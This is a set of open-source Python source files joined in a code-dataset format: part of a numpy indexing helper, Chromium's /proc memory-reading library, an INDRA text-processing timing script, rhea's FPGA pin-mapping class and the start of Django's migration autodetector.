[12, 13, 14, -1]])
These cover only a small part of the whole array (two diagonals right
of the main one):
>>> a[iu2] = -10
>>> a
array([[ -1, -1, -10, -10],
[ 4, -1, -1, -10],
[ 8, 9, -1, -1],
[ 12, 13, 14, -1]])
"""
return mask_indices(n,triu,k)
def triu_indices_from(arr,k=0):
"""
Return the indices for the upper-triangle of an (n, n) array.
See `triu_indices` for full details.
Parameters
----------
n : int
Sets the size of the arrays for which the returned indices will be valid.
k : int, optional
Diagonal offset (see `triu` for details).
See Also
--------
triu_indices, triu
Notes
-----
.. versionadded:: 1.4.0
"""
if not arr.ndim==2 and arr.shape[0] == arr.shape[1]:
raise ValueError("input array must be 2-d and square")
return triu_indices(arr.shape[0],k)
| bsd-3-clause |
ChronoMonochrome/android_external_chromium_org | tools/linux/procfs.py | 23 | 20724 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# A Python library to read and store procfs (/proc) information on Linux.
#
# Each information storage class in this file stores original data as original
# as reasonablly possible. Translation is done when requested. It is to make it
# always possible to probe the original data.
import collections
import logging
import os
import re
import struct
import sys
class _NullHandler(logging.Handler):
def emit(self, record):
pass
_LOGGER = logging.getLogger('procfs')
_LOGGER.addHandler(_NullHandler())
class ProcStat(object):
"""Reads and stores information in /proc/pid/stat."""
_PATTERN = re.compile(r'^'
'(?P<PID>-?[0-9]+) '
'\((?P<COMM>.+)\) '
'(?P<STATE>[RSDZTW]) '
'(?P<PPID>-?[0-9]+) '
'(?P<PGRP>-?[0-9]+) '
'(?P<SESSION>-?[0-9]+) '
'(?P<TTY_NR>-?[0-9]+) '
'(?P<TPGID>-?[0-9]+) '
'(?P<FLAGS>[0-9]+) '
'(?P<MINFIT>[0-9]+) '
'(?P<CMINFIT>[0-9]+) '
'(?P<MAJFIT>[0-9]+) '
'(?P<CMAJFIT>[0-9]+) '
'(?P<UTIME>[0-9]+) '
'(?P<STIME>[0-9]+) '
'(?P<CUTIME>[0-9]+) '
'(?P<CSTIME>[0-9]+) '
'(?P<PRIORITY>[0-9]+) '
'(?P<NICE>[0-9]+) '
'(?P<NUM_THREADS>[0-9]+) '
'(?P<ITREALVALUE>[0-9]+) '
'(?P<STARTTIME>[0-9]+) '
'(?P<VSIZE>[0-9]+) '
'(?P<RSS>[0-9]+) '
'(?P<RSSLIM>[0-9]+) '
'(?P<STARTCODE>[0-9]+) '
'(?P<ENDCODE>[0-9]+) '
'(?P<STARTSTACK>[0-9]+) '
'(?P<KSTKESP>[0-9]+) '
'(?P<KSTKEIP>[0-9]+) '
'(?P<SIGNAL>[0-9]+) '
'(?P<BLOCKED>[0-9]+) '
'(?P<SIGIGNORE>[0-9]+) '
'(?P<SIGCATCH>[0-9]+) '
'(?P<WCHAN>[0-9]+) '
'(?P<NSWAP>[0-9]+) '
'(?P<CNSWAP>[0-9]+) '
'(?P<EXIT_SIGNAL>[0-9]+) '
'(?P<PROCESSOR>[0-9]+) '
'(?P<RT_PRIORITY>[0-9]+) '
'(?P<POLICY>[0-9]+) '
'(?P<DELAYACCT_BLKIO_TICKS>[0-9]+) '
'(?P<GUEST_TIME>[0-9]+) '
'(?P<CGUEST_TIME>[0-9]+)', re.IGNORECASE)
def __init__(self, raw, pid, vsize, rss):
self._raw = raw
self._pid = pid
self._vsize = vsize
self._rss = rss
@staticmethod
def load_file(stat_f):
raw = stat_f.readlines()
stat = ProcStat._PATTERN.match(raw[0])
return ProcStat(raw,
stat.groupdict().get('PID'),
stat.groupdict().get('VSIZE'),
stat.groupdict().get('RSS'))
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'stat'), 'r') as stat_f:
return ProcStat.load_file(stat_f)
@property
def raw(self):
return self._raw
@property
def pid(self):
return int(self._pid)
@property
def vsize(self):
return int(self._vsize)
@property
def rss(self):
return int(self._rss)
class ProcStatm(object):
"""Reads and stores information in /proc/pid/statm."""
_PATTERN = re.compile(r'^'
'(?P<SIZE>[0-9]+) '
'(?P<RESIDENT>[0-9]+) '
'(?P<SHARE>[0-9]+) '
'(?P<TEXT>[0-9]+) '
'(?P<LIB>[0-9]+) '
'(?P<DATA>[0-9]+) '
'(?P<DT>[0-9]+)', re.IGNORECASE)
def __init__(self, raw, size, resident, share, text, lib, data, dt):
self._raw = raw
self._size = size
self._resident = resident
self._share = share
self._text = text
self._lib = lib
self._data = data
self._dt = dt
@staticmethod
def load_file(statm_f):
raw = statm_f.readlines()
statm = ProcStatm._PATTERN.match(raw[0])
return ProcStatm(raw,
statm.groupdict().get('SIZE'),
statm.groupdict().get('RESIDENT'),
statm.groupdict().get('SHARE'),
statm.groupdict().get('TEXT'),
statm.groupdict().get('LIB'),
statm.groupdict().get('DATA'),
statm.groupdict().get('DT'))
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'statm'), 'r') as statm_f:
return ProcStatm.load_file(statm_f)
@property
def raw(self):
return self._raw
@property
def size(self):
return int(self._size)
@property
def resident(self):
return int(self._resident)
@property
def share(self):
return int(self._share)
@property
def text(self):
return int(self._text)
@property
def lib(self):
return int(self._lib)
@property
def data(self):
return int(self._data)
@property
def dt(self):
return int(self._dt)
class ProcStatus(object):
"""Reads and stores information in /proc/pid/status."""
_PATTERN = re.compile(r'^(?P<NAME>[A-Za-z0-9_]+):\s+(?P<VALUE>.*)')
def __init__(self, raw, dct):
self._raw = raw
self._pid = dct.get('Pid')
self._name = dct.get('Name')
self._vm_peak = dct.get('VmPeak')
self._vm_size = dct.get('VmSize')
self._vm_lck = dct.get('VmLck')
self._vm_pin = dct.get('VmPin')
self._vm_hwm = dct.get('VmHWM')
self._vm_rss = dct.get('VmRSS')
self._vm_data = dct.get('VmData')
self._vm_stack = dct.get('VmStk')
self._vm_exe = dct.get('VmExe')
self._vm_lib = dct.get('VmLib')
self._vm_pte = dct.get('VmPTE')
self._vm_swap = dct.get('VmSwap')
@staticmethod
def load_file(status_f):
raw = status_f.readlines()
dct = {}
for line in raw:
status_match = ProcStatus._PATTERN.match(line)
if status_match:
match_dict = status_match.groupdict()
dct[match_dict['NAME']] = match_dict['VALUE']
else:
raise SyntaxError('Unknown /proc/pid/status format.')
return ProcStatus(raw, dct)
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'status'), 'r') as status_f:
return ProcStatus.load_file(status_f)
@property
def raw(self):
return self._raw
@property
def pid(self):
return int(self._pid)
@property
def vm_peak(self):
"""Returns a high-water (peak) virtual memory size in kilo-bytes."""
if self._vm_peak.endswith('kB'):
return int(self._vm_peak.split()[0])
raise ValueError('VmPeak is not in kB.')
@property
def vm_size(self):
"""Returns a virtual memory size in kilo-bytes."""
if self._vm_size.endswith('kB'):
return int(self._vm_size.split()[0])
raise ValueError('VmSize is not in kB.')
@property
def vm_hwm(self):
"""Returns a high-water (peak) resident set size (RSS) in kilo-bytes."""
if self._vm_hwm.endswith('kB'):
return int(self._vm_hwm.split()[0])
raise ValueError('VmHWM is not in kB.')
@property
def vm_rss(self):
"""Returns a resident set size (RSS) in kilo-bytes."""
if self._vm_rss.endswith('kB'):
return int(self._vm_rss.split()[0])
raise ValueError('VmRSS is not in kB.')
class ProcMapsEntry(object):
"""A class representing one line in /proc/pid/maps."""
def __init__(
self, begin, end, readable, writable, executable, private, offset,
major, minor, inode, name):
self.begin = begin
self.end = end
self.readable = readable
self.writable = writable
self.executable = executable
self.private = private
self.offset = offset
self.major = major
self.minor = minor
self.inode = inode
self.name = name
def as_dict(self):
return {
'begin': self.begin,
'end': self.end,
'readable': self.readable,
'writable': self.writable,
'executable': self.executable,
'private': self.private,
'offset': self.offset,
'major': self.major,
'minor': self.minor,
'inode': self.inode,
'name': self.name,
}
class ProcMaps(object):
"""Reads and stores information in /proc/pid/maps."""
MAPS_PATTERN = re.compile(
r'^([a-f0-9]+)-([a-f0-9]+)\s+(.)(.)(.)(.)\s+([a-f0-9]+)\s+(\S+):(\S+)\s+'
r'(\d+)\s*(.*)$', re.IGNORECASE)
def __init__(self):
self._sorted_indexes = []
self._dictionary = {}
self._sorted = True
def iter(self, condition):
if not self._sorted:
self._sorted_indexes.sort()
self._sorted = True
for index in self._sorted_indexes:
if not condition or condition(self._dictionary[index]):
yield self._dictionary[index]
def __iter__(self):
if not self._sorted:
self._sorted_indexes.sort()
self._sorted = True
for index in self._sorted_indexes:
yield self._dictionary[index]
@staticmethod
def load_file(maps_f):
table = ProcMaps()
for line in maps_f:
table.append_line(line)
return table
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'maps'), 'r') as maps_f:
return ProcMaps.load_file(maps_f)
def append_line(self, line):
entry = self.parse_line(line)
if entry:
self._append_entry(entry)
return entry
@staticmethod
def parse_line(line):
matched = ProcMaps.MAPS_PATTERN.match(line)
if matched:
return ProcMapsEntry( # pylint: disable=W0212
int(matched.group(1), 16), # begin
int(matched.group(2), 16), # end
matched.group(3), # readable
matched.group(4), # writable
matched.group(5), # executable
matched.group(6), # private
int(matched.group(7), 16), # offset
matched.group(8), # major
matched.group(9), # minor
int(matched.group(10), 10), # inode
matched.group(11) # name
)
else:
return None
@staticmethod
def constants(entry):
return (entry.writable == '-' and entry.executable == '-' and re.match(
'\S+(\.(so|dll|dylib|bundle)|chrome)((\.\d+)+\w*(\.\d+){0,3})?',
entry.name))
@staticmethod
def executable(entry):
return (entry.executable == 'x' and re.match(
'\S+(\.(so|dll|dylib|bundle)|chrome)((\.\d+)+\w*(\.\d+){0,3})?',
entry.name))
@staticmethod
def executable_and_constants(entry):
return (((entry.writable == '-' and entry.executable == '-') or
entry.executable == 'x') and re.match(
'\S+(\.(so|dll|dylib|bundle)|chrome)((\.\d+)+\w*(\.\d+){0,3})?',
entry.name))
def _append_entry(self, entry):
if self._sorted_indexes and self._sorted_indexes[-1] > entry.begin:
self._sorted = False
self._sorted_indexes.append(entry.begin)
self._dictionary[entry.begin] = entry
class ProcSmaps(object):
"""Reads and stores information in /proc/pid/smaps."""
_SMAPS_PATTERN = re.compile(r'^(?P<NAME>[A-Za-z0-9_]+):\s+(?P<VALUE>.*)')
class VMA(object):
def __init__(self):
self._size = 0
self._rss = 0
self._pss = 0
def append(self, name, value):
dct = {
'Size': '_size',
'Rss': '_rss',
'Pss': '_pss',
'Referenced': '_referenced',
'Private_Clean': '_private_clean',
'Shared_Clean': '_shared_clean',
'KernelPageSize': '_kernel_page_size',
'MMUPageSize': '_mmu_page_size',
}
if name in dct:
self.__setattr__(dct[name], value)
@property
def size(self):
if self._size.endswith('kB'):
return int(self._size.split()[0])
return int(self._size)
@property
def rss(self):
if self._rss.endswith('kB'):
return int(self._rss.split()[0])
return int(self._rss)
@property
def pss(self):
if self._pss.endswith('kB'):
return int(self._pss.split()[0])
return int(self._pss)
def __init__(self, raw, total_dct, maps, vma_internals):
self._raw = raw
self._size = total_dct['Size']
self._rss = total_dct['Rss']
self._pss = total_dct['Pss']
self._referenced = total_dct['Referenced']
self._shared_clean = total_dct['Shared_Clean']
self._private_clean = total_dct['Private_Clean']
self._kernel_page_size = total_dct['KernelPageSize']
self._mmu_page_size = total_dct['MMUPageSize']
self._maps = maps
self._vma_internals = vma_internals
@staticmethod
def load(pid):
with open(os.path.join('/proc', str(pid), 'smaps'), 'r') as smaps_f:
raw = smaps_f.readlines()
vma = None
vma_internals = collections.OrderedDict()
total_dct = collections.defaultdict(int)
maps = ProcMaps()
for line in raw:
maps_match = ProcMaps.MAPS_PATTERN.match(line)
if maps_match:
vma = maps.append_line(line.strip())
vma_internals[vma] = ProcSmaps.VMA()
else:
smaps_match = ProcSmaps._SMAPS_PATTERN.match(line)
if smaps_match:
match_dict = smaps_match.groupdict()
vma_internals[vma].append(match_dict['NAME'], match_dict['VALUE'])
total_dct[match_dict['NAME']] += int(match_dict['VALUE'].split()[0])
return ProcSmaps(raw, total_dct, maps, vma_internals)
@property
def size(self):
return self._size
@property
def rss(self):
return self._rss
@property
def referenced(self):
return self._referenced
@property
def pss(self):
return self._pss
@property
def private_clean(self):
return self._private_clean
@property
def shared_clean(self):
return self._shared_clean
@property
def kernel_page_size(self):
return self._kernel_page_size
@property
def mmu_page_size(self):
return self._mmu_page_size
@property
def vma_internals(self):
return self._vma_internals
class ProcPagemap(object):
"""Reads and stores partial information in /proc/pid/pagemap.
It picks up virtual addresses to read based on ProcMaps (/proc/pid/maps).
See https://www.kernel.org/doc/Documentation/vm/pagemap.txt for details.
"""
_BYTES_PER_PAGEMAP_VALUE = 8
_BYTES_PER_OS_PAGE = 4096
_VIRTUAL_TO_PAGEMAP_OFFSET = _BYTES_PER_OS_PAGE / _BYTES_PER_PAGEMAP_VALUE
_MASK_PRESENT = 1 << 63
_MASK_SWAPPED = 1 << 62
_MASK_FILEPAGE_OR_SHAREDANON = 1 << 61
_MASK_SOFTDIRTY = 1 << 55
_MASK_PFN = (1 << 55) - 1
class VMA(object):
def __init__(self, vsize, present, swapped, pageframes):
self._vsize = vsize
self._present = present
self._swapped = swapped
self._pageframes = pageframes
@property
def vsize(self):
return int(self._vsize)
@property
def present(self):
return int(self._present)
@property
def swapped(self):
return int(self._swapped)
@property
def pageframes(self):
return self._pageframes
def __init__(self, vsize, present, swapped, vma_internals, in_process_dup):
self._vsize = vsize
self._present = present
self._swapped = swapped
self._vma_internals = vma_internals
self._in_process_dup = in_process_dup
@staticmethod
def load(pid, maps):
total_present = 0
total_swapped = 0
total_vsize = 0
in_process_dup = 0
vma_internals = collections.OrderedDict()
process_pageframe_set = set()
pagemap_fd = os.open(
os.path.join('/proc', str(pid), 'pagemap'), os.O_RDONLY)
for vma in maps:
present = 0
swapped = 0
vsize = 0
pageframes = collections.defaultdict(int)
begin_offset = ProcPagemap._offset(vma.begin)
chunk_size = ProcPagemap._offset(vma.end) - begin_offset
os.lseek(pagemap_fd, begin_offset, os.SEEK_SET)
buf = os.read(pagemap_fd, chunk_size)
if len(buf) < chunk_size:
_LOGGER.warn('Failed to read pagemap at 0x%x in %d.' % (vma.begin, pid))
pagemap_values = struct.unpack(
'=%dQ' % (len(buf) / ProcPagemap._BYTES_PER_PAGEMAP_VALUE), buf)
for pagemap_value in pagemap_values:
vsize += ProcPagemap._BYTES_PER_OS_PAGE
if pagemap_value & ProcPagemap._MASK_PRESENT:
if (pagemap_value & ProcPagemap._MASK_PFN) in process_pageframe_set:
in_process_dup += ProcPagemap._BYTES_PER_OS_PAGE
else:
process_pageframe_set.add(pagemap_value & ProcPagemap._MASK_PFN)
if (pagemap_value & ProcPagemap._MASK_PFN) not in pageframes:
present += ProcPagemap._BYTES_PER_OS_PAGE
pageframes[pagemap_value & ProcPagemap._MASK_PFN] += 1
if pagemap_value & ProcPagemap._MASK_SWAPPED:
swapped += ProcPagemap._BYTES_PER_OS_PAGE
vma_internals[vma] = ProcPagemap.VMA(vsize, present, swapped, pageframes)
total_present += present
total_swapped += swapped
total_vsize += vsize
os.close(pagemap_fd)
return ProcPagemap(total_vsize, total_present, total_swapped,
vma_internals, in_process_dup)
@staticmethod
def _offset(virtual_address):
return virtual_address / ProcPagemap._VIRTUAL_TO_PAGEMAP_OFFSET
@property
def vsize(self):
return int(self._vsize)
@property
def present(self):
return int(self._present)
@property
def swapped(self):
return int(self._swapped)
@property
def vma_internals(self):
return self._vma_internals
class _ProcessMemory(object):
"""Aggregates process memory information from /proc for manual testing."""
def __init__(self, pid):
self._pid = pid
self._maps = None
self._pagemap = None
self._stat = None
self._status = None
self._statm = None
self._smaps = []
def _read(self, proc_file):
lines = []
with open(os.path.join('/proc', str(self._pid), proc_file), 'r') as proc_f:
lines = proc_f.readlines()
return lines
def read_all(self):
self.read_stat()
self.read_statm()
self.read_status()
self.read_smaps()
self.read_maps()
self.read_pagemap(self._maps)
def read_maps(self):
self._maps = ProcMaps.load(self._pid)
def read_pagemap(self, maps):
self._pagemap = ProcPagemap.load(self._pid, maps)
def read_smaps(self):
self._smaps = ProcSmaps.load(self._pid)
def read_stat(self):
self._stat = ProcStat.load(self._pid)
def read_statm(self):
self._statm = ProcStatm.load(self._pid)
def read_status(self):
self._status = ProcStatus.load(self._pid)
@property
def pid(self):
return self._pid
@property
def maps(self):
return self._maps
@property
def pagemap(self):
return self._pagemap
@property
def smaps(self):
return self._smaps
@property
def stat(self):
return self._stat
@property
def statm(self):
return self._statm
@property
def status(self):
return self._status
def main(argv):
"""The main function for manual testing."""
_LOGGER.setLevel(logging.WARNING)
handler = logging.StreamHandler()
handler.setLevel(logging.WARNING)
handler.setFormatter(logging.Formatter(
'%(asctime)s:%(name)s:%(levelname)s:%(message)s'))
_LOGGER.addHandler(handler)
pids = []
for arg in argv[1:]:
try:
pid = int(arg)
except ValueError:
raise SyntaxError("%s is not an integer." % arg)
else:
pids.append(pid)
procs = {}
for pid in pids:
procs[pid] = _ProcessMemory(pid)
procs[pid].read_all()
print '=== PID: %d ===' % pid
print ' stat: %d' % procs[pid].stat.vsize
print ' statm: %d' % (procs[pid].statm.size * 4096)
print ' status: %d (Peak:%d)' % (procs[pid].status.vm_size * 1024,
procs[pid].status.vm_peak * 1024)
print ' smaps: %d' % (procs[pid].smaps.size * 1024)
print 'pagemap: %d' % procs[pid].pagemap.vsize
print ' stat: %d' % (procs[pid].stat.rss * 4096)
print ' statm: %d' % (procs[pid].statm.resident * 4096)
print ' status: %d (Peak:%d)' % (procs[pid].status.vm_rss * 1024,
procs[pid].status.vm_hwm * 1024)
print ' smaps: %d' % (procs[pid].smaps.rss * 1024)
print 'pagemap: %d' % procs[pid].pagemap.present
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |
sorgerlab/indra | indra/sources/isi/experiments.py | 6 | 2074 | import pickle
import time
import os
from indra.sources.isi.api import process_preprocessed
from indra.sources.isi.preprocessor import IsiPreprocessor
def abstracts_runtime():
pfile = '/Users/daniel/Downloads/text_content_sample.pkl'
dump = pickle.load(open(pfile, 'rb'))
all_abstracts = dump['pubmed']
# abstract_counts = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]
# abstract_counts = [20, 40, 60, 80, 100]
# abstract_counts = [20, 50, 100, 1000, None]
# abstract_counts = [20, 50, 100, 200, 300, 400, 500]
abstract_counts = [10]
times = []
for count in abstract_counts:
print('==============================================================')
print('Count:', count)
print('==============================================================')
with open('isi_experiment_log.txt', 'a') as f:
f.write('Reading and processing ' + str(count) + 'abstracts\n')
start_time = time.time()
if count is None:
abstract_subset = all_abstracts
else:
abstract_subset = all_abstracts[:count]
assert(len(abstract_subset) == count)
preprocessed_dir = 'preprocessed_' + str(count)
os.mkdir(preprocessed_dir)
preprocessor = IsiPreprocessor(preprocessed_dir)
preprocessor.preprocess_abstract_list(abstract_subset)
output_dir = 'output_' + str(count)
os.mkdir(output_dir)
ip = process_preprocessed(preprocessor, 8, output_dir)
print('Statements:', ip.statements)
output_pickle = 'isi_processed_abstracts_' + str(count) + '.pkl'
pickle.dump(ip, open(output_pickle, 'wb'))
# How long did that take?
ellapsed_s = time.time() - start_time
ellapsed_min = ellapsed_s / 60.0
times.append(ellapsed_min)
with open('isi_experiment_log.txt', 'a') as f:
f.write('Times so far: ')
f.write(repr(times))
f.write('\n')
print('Times:')
print(times)
if __name__ == '__main__':
abstracts_runtime()
| bsd-2-clause |
cfelton/rhea | rhea/build/fpga.py | 1 | 8511 | #
# Copyright (c) 2014-2015 Christopher Felton
#
import os
import shutil
import inspect
from random import randint
from copy import copy
import myhdl
from myhdl._block import _Block as Block
from .extintf import Port
from .extintf import Clock
from .extintf import Reset
class FPGA(object):
""" """
vendor = "" # FPGA vendor, Altera, Xilinx, Lattice
device = "" # FPGA device type
family = "" # FPGA family
_name = None
# relate ports to the hardware pins
default_clocks = {}
default_resets = {}
default_ports = {}
default_extintf = {}
def __init__(self):
# default attributes
self.top = None # top-level myhdl module
self.top_params = None # top-level parameters
self.top_name = self._name # resulting name, project name etc.
self._clocks = {}
self._resets = {}
self._ports = {}
self._extintfs = {}
# walk through the default settings
for k, v in self.default_clocks.items():
self.add_clock(k, **v)
for k, v in self.default_resets.items():
self.add_reset(k, **v)
for k, v in self.default_ports.items():
self.add_port(k, **v)
for k, v in self.default_extintf.items():
self.add_extintf(k, v)
@property
def ports(self):
return self._ports
def get_port(self, port_name):
port = None
if port_name in self._ports:
port = self._ports[port_name]
return port
def has_top(self):
""" a top-level is set """
return self.top is not None
def set_top(self, top, **params):
self.top = top
self.top_params = params
if self.top_name is None:
self.top_name = top.func_name
def get_flow(self):
raise NotImplementedError
def _remove_embed_attr(self, pins, pattr):
""" removed an embedded pin attribute def if present.
"""
for v in pins:
if isinstance(v, dict):
pattr = v
pins.remove(v)
break
return pattr
def add_clock(self, name, frequency=1, pins=None, **pattr):
if isinstance(pins, (list,tuple)):
pins = pins[0]
assert isinstance(pins, (str,int)), "pins type %s" % (type(pins))
p = Port(name, pins, sigtype=Clock(0, frequency=frequency), **pattr)
self._clocks[name] = p
self._ports[name] = p
def add_reset(self, name, active, isasync, pins, **pattr):
assert isinstance(isasync, bool)
assert active in (0,1,)
p = Port(name, pins,
sigtype=Reset(0, active=active, isasync=isasync), **pattr)
# add to the reset and port dicts
self._resets[name] = p
self._ports[name] = p
def add_port(self, name, pins, **pattr):
""" add a port definition
A port definition maps a port (an HDL top-level signal name)
to a pin on the physical device including any attributes of
the pin / signal.
Example:
brd.add_port("gpio", pins=(23,24,25,26,), pullup=True)
It is acceptable to have ports with the same names.
"""
if isinstance(pins, (str, int)):
pins = [pins,]
assert isinstance(pins, (list,tuple)), \
"pins must be a list/tuple of pins (or a single str/int)"
pins = list(pins)
pattr = self._remove_embed_attr(pins, pattr)
# make sure the pin list is a number or string
for v in pins:
assert isinstance(v, (str, int))
# @todo: raise an error vs.
assert name not in self._ports, \
"{} already exists in {}".format(name, self._name)
self._ports[name] = Port(name, pins, **pattr)
def add_port_name(self, name, port, slc=None, **pattr):
""" add a new name, *name*, to an existing port, *port*.
This function is used when the default port name is known
but not the pins (if the pins are known use add_port).
A port name is linked to a default port name or a subset
(slice) is linked to the new name.
Example:
brd.add_port_name('led', 'wingC', 7)
where wingC is a 16-bit port bit-vector
To extract a range from the port, the slice class has to
be used, example:
brd.link_port_name('MSB', 'wingC', slice(16,8))
"""
p = self._ports[port]
if slc is None:
pins = p.pins
else:
if isinstance(slc, (slice, int)):
pins = p.pins[slc]
elif isinstance(slc, (list, tuple)):
pins = []
for i in slc:
if isinstance(i, int):
pins.append(p.pins[i])
else:
pins += list(p.pins[i])
else:
raise Exception("slc must be an int, a slice, or a list of these")
kws = p.pattr.copy()
kws.update(pattr)
self.add_port(name, pins, **kws)
def rename_port(self, port, name, slc=None, **pattr):
""" rename a *port* to a new *name*
This function is useful for *bootstrapping*, bootstrapping
uses the port names that exist in the object and doesn't
have a method to select from multiple definitions. Also,
useful when the top-level HDL has conflicts.
"""
pass
def add_extintf(self, name, extintf):
"""
"""
self._extintfs[name] = extintf
# @todo: extract all the ports from the extintf and
# add them to the global port dict
pass
def get_portmap(self, top=None, **kwargs):
""" given a top-level map the port definitions
This module will map the top-level MyHDL module ports
to a board definition.
Example usage:
brd = rhea.build..get_board(<board name>)
portmap = brd.get_portmatp(top=m_myhdl_module)
myhdl.toVerilog(m_myhdl_module, **portmap)
"""
if top is not None:
self.set_top(top)
# get the top-level ports and parameters
assert self.top is not None
pp = inspect.getargspec(self.top.func)
# all of the arguments (no default values) are treated as
# ports. This doesn't mean it needs to be a port but it
# is convention that ports are the arguments and parameters
# are keyword arguments. A parameter can exist in this
# list but it can't be empty ...
# @todo: this needs some more thought, keyword args might
# be ports, need a method to determine.
hdlports = {}
if pp.defaults is not None:
pl = len(pp.args)-len(pp.defaults)
else:
pl = len(pp.args)
for pn in pp.args[:pl]:
hdlports[pn] = None
params = {}
for ii, kw in enumerate(pp.args[pl:]):
params[kw] = pp.defaults[ii]
# see if any of the ports or parameters have been overridden
if self.top_params is not None:
for k, v in self.top_params.items():
if k in hdlports:
hdlports[k] = v
for k, v in self.top_params.items():
if k in params:
params[k] = v
for k, v in kwargs.items():
if k in hdlports:
hdlports[k] = v
for k, v in kwargs.items():
if k in params:
params[k] = v
# @todo: log this information, some parameters can be too large
# to be useful dumping to screen (print).
# log.write("HDL PORTS %s" % (hdlports,))
# log.write("HDL PARAMS %s" % (params,))
# match the fpga ports to the hdl ports, not if a port is
# a keyword argument in the top-level this will fail
# @todo: this matching code needs to be enhanced, this should
# always match a top-level port to a port def.
for port_name,port in self._ports.items():
if port_name in hdlports:
hdlports[port_name] = port.sig
port.inuse = True
for k, v in hdlports.items():
assert v is not None, "Error unspecified port %s"%(k)
# combine the ports and params
pp = hdlports.copy()
pp.update(params)
return pp
| mit |
h4r5h1t/django-hauthy | django/db/migrations/autodetector.py | 87 | 54478 | from __future__ import unicode_literals
import datetime
import re
from itertools import chain
from django.conf import settings
from django.db import models
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.operations.models import AlterModelOptions
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.questioner import MigrationQuestioner
from django.utils import six
from .topological_sort import stable_topological_sort
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
self.from_state = from_state
self.to_state = to_state
self.questioner = questioner or MigrationQuestioner()
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
"""
Main entry point to produce a list of appliable changes.
Takes a graph to base names on and an optional set of apps
to try and restrict to (restriction is not guaranteed)
"""
changes = self._detect_changes(convert_apps, graph)
changes = self.arrange_for_graph(changes, graph, migration_name)
if trim_to_apps:
changes = self._trim_to_apps(changes, trim_to_apps)
return changes
def deep_deconstruct(self, obj):
"""
Recursive deconstruction for a field and its arguments.
Used for full comparison for rename/alter; sometimes a single-level
deconstruction will not compare correctly.
"""
if not hasattr(obj, 'deconstruct') or isinstance(obj, type):
return obj
deconstructed = obj.deconstruct()
if isinstance(obj, models.Field):
# we have a field which also returns a name
deconstructed = deconstructed[1:]
path, args, kwargs = deconstructed
return (
path,
[self.deep_deconstruct(value) for value in args],
{
key: self.deep_deconstruct(value)
for key, value in kwargs.items()
},
)
def only_relation_agnostic_fields(self, fields):
"""
Return a definition of the fields that ignores field names and
what related fields actually relate to.
Used for detecting renames (as, of course, the related fields
change during renames)
"""
fields_def = []
for name, field in fields:
deconstruction = self.deep_deconstruct(field)
if field.rel and field.rel.to:
del deconstruction[2]['to']
fields_def.append(deconstruction)
return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
"""
Returns a dict of migration plans which will achieve the
change from from_state to to_state. The dict has app labels
as keys and a list of migrations as values.
The resulting migrations aren't specially named, but the names
do matter for dependencies inside the set.
convert_apps is the list of apps to convert to use migrations
(i.e. to make initial migrations for, in the usual case)
graph is an optional argument that, if provided, can help improve
dependency generation and avoid potential circular dependencies.
"""
# The first phase is generating all the operations for each app
# and gathering them into a big per-app list.
# We'll then go through that list later and order it and split
# into migrations to resolve dependencies caused by M2Ms and FKs.
self.generated_operations = {}
# Prepare some old/new state and model lists, separating
# proxy models and ignoring unmigrated apps.
self.old_apps = self.from_state.concrete_apps
self.new_apps = self.to_state.apps
self.old_model_keys = []
self.old_proxy_keys = []
self.old_unmanaged_keys = []
self.new_model_keys = []
self.new_proxy_keys = []
self.new_unmanaged_keys = []
for al, mn in sorted(self.from_state.models.keys()):
model = self.old_apps.get_model(al, mn)
if not model._meta.managed:
self.old_unmanaged_keys.append((al, mn))
elif al not in self.from_state.real_apps:
if model._meta.proxy:
self.old_proxy_keys.append((al, mn))
else:
self.old_model_keys.append((al, mn))
for al, mn in sorted(self.to_state.models.keys()):
model = self.new_apps.get_model(al, mn)
if not model._meta.managed:
self.new_unmanaged_keys.append((al, mn))
elif (
al not in self.from_state.real_apps or
(convert_apps and al in convert_apps)
):
if model._meta.proxy:
self.new_proxy_keys.append((al, mn))
else:
self.new_model_keys.append((al, mn))
# Renames have to come first
self.generate_renamed_models()
# Prepare field lists, and prepare a list of the fields that used
# through models in the old state so we can make dependencies
# from the through model deletion to the field that uses it.
self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
self.through_users = {}
self.old_field_keys = set()
self.new_field_keys = set()
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
# Through model map generation
for app_label, model_name in sorted(self.old_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
for field_name, field in old_model_state.fields:
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(field_name)
if (hasattr(old_field, "rel") and getattr(old_field.rel, "through", None)
and not old_field.rel.through._meta.auto_created):
through_key = (
old_field.rel.through._meta.app_label,
old_field.rel.through._meta.model_name,
)
self.through_users[through_key] = (app_label, old_model_name, field_name)
# Generate non-rename model operations
self.generate_deleted_models()
self.generate_created_models()
self.generate_deleted_proxies()
self.generate_created_proxies()
self.generate_altered_options()
self.generate_altered_managers()
# Generate field operations
self.generate_renamed_fields()
self.generate_removed_fields()
